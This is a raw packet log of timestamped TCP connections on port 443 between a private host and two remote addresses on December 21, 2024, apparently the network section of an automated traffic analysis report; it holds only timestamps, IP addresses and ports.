                                                                                                                                            Dec 21, 2024 20:13:56.981252909 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.981281042 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.981286049 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.981311083 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.981328964 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.987072945 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.987116098 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.987144947 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.987150908 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.987178087 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.987195015 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.993294954 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.993339062 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.993372917 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.993379116 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.993405104 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.993422031 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:56.999927044 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.999968052 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:56.999998093 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.000053883 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.000082016 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.000102043 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.006335020 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.006377935 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.006408930 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.006413937 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.006443024 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.006453037 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.012984991 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.013024092 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.013056040 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.013062000 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.013087988 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.013099909 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.019154072 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.019193888 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.019222021 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.019227982 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.019254923 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.019273996 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.025002956 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.025047064 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.025078058 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.025085926 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.025101900 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.025146008 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.031645060 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.031687021 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.031714916 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.031722069 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.031748056 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.031761885 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.038119078 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.038177967 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.038192987 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.038199902 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.038232088 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.044493914 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.044533014 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.044558048 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.044564009 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.044584036 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.044599056 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.050914049 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.050955057 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.050987005 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.050993919 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.051021099 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.051033020 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.056842089 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.056898117 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.056911945 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.056919098 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.056946993 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.056967020 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.063411951 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.063451052 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.063483000 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.063489914 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.063510895 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.063524961 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.090261936 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.090322018 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.090382099 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.090388060 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.090414047 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.090430975 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.096853018 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.096899986 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.096915960 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.096924067 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.096949100 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.096966982 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.102715015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.102771044 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.102859974 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.102868080 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.105349064 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.109114885 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.109173059 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.109206915 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.109215021 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.109249115 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.109267950 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.132071018 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.132118940 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.132148027 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.132157087 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.132265091 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.138734102 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.138777018 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.138808966 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.138816118 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.138849020 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.138868093 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.144552946 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.144623995 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.144664049 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.144670010 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.144694090 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.144716024 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.151201963 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.151246071 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.151303053 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.151309967 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.151345968 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.151366949 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.282597065 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.282660961 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.282800913 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.282800913 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.282812119 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.283107042 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.286317110 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.286387920 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.286400080 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.286421061 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.286451101 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.286490917 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.290149927 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.290193081 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.290218115 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.290224075 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.290246010 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.290270090 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.294763088 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.294805050 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.294830084 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.294841051 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.294861078 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.294876099 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.325161934 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.325234890 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.325254917 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.325268030 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.325290918 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.325314999 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.329030037 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.329098940 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.329118013 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.329125881 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.329153061 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.329169035 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.332609892 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.332653046 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.332712889 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.332720041 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.332743883 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.332768917 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.339284897 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.339366913 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.339385986 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.339458942 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.475131035 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.475195885 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.475333929 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.475333929 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.475346088 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.475394011 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.479259968 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.479310036 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.479347944 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.479356050 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.479393005 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.479413986 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.482573032 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.482628107 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.482671022 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.482676983 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.482702971 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.482726097 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.486555099 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.486598015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.486629963 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.486634970 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.486661911 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.486685038 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.517211914 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.517276049 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.517302990 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.517308950 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.517539978 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.517539978 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.520818949 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.520885944 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.520905972 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.520912886 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.520940065 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.520958900 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.524713993 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.524756908 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.524786949 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.524792910 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.524820089 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.524838924 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.531569958 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.531631947 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.531651020 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.531657934 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.531691074 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.668433905 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.668494940 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.668526888 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.668538094 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.668570042 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.668804884 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.670806885 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.670890093 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.670905113 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.670949936 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.670993090 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.671000957 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.671082973 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:57.671175003 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:57.673204899 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:15:12.204649925 CET49820443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:12.204744101 CET44349820172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:12.204925060 CET49820443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:12.206058979 CET49820443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:12.206099033 CET44349820172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:17.320235968 CET44349820172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:17.320337057 CET49820443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:17.326976061 CET49820443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:17.327011108 CET44349820172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:17.327265024 CET44349820172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:17.368773937 CET49820443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:17.368835926 CET49820443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:17.368891954 CET44349820172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:29.277422905 CET44349820172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:29.277522087 CET44349820172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:29.277590990 CET49820443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:29.280168056 CET49820443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:29.280210018 CET44349820172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:29.320452929 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:29.320550919 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:29.320631027 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:29.320970058 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:29.321019888 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:30.559537888 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:30.559613943 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:30.560822010 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:30.560832024 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:30.561058044 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:30.562271118 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:30.562311888 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:30.562336922 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.626651049 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.627190113 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.627223015 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.627264977 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.627331972 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.627624989 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.627980947 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.628717899 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.628750086 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.628797054 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.628813028 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.628880024 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.635334015 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.644290924 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.644428968 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.644459009 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.746470928 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.746540070 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.746618986 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.818945885 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.819005966 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.819029093 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.824103117 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.824141979 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.824162006 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.824181080 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.824244976 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.824281931 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.824311018 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.824559927 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.824559927 CET49821443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.824595928 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.824631929 CET44349821172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.928180933 CET49822443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.928297997 CET44349822172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:31.928415060 CET49822443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.928765059 CET49822443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:31.928811073 CET44349822172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:33.166953087 CET44349822172.67.151.193192.168.2.4
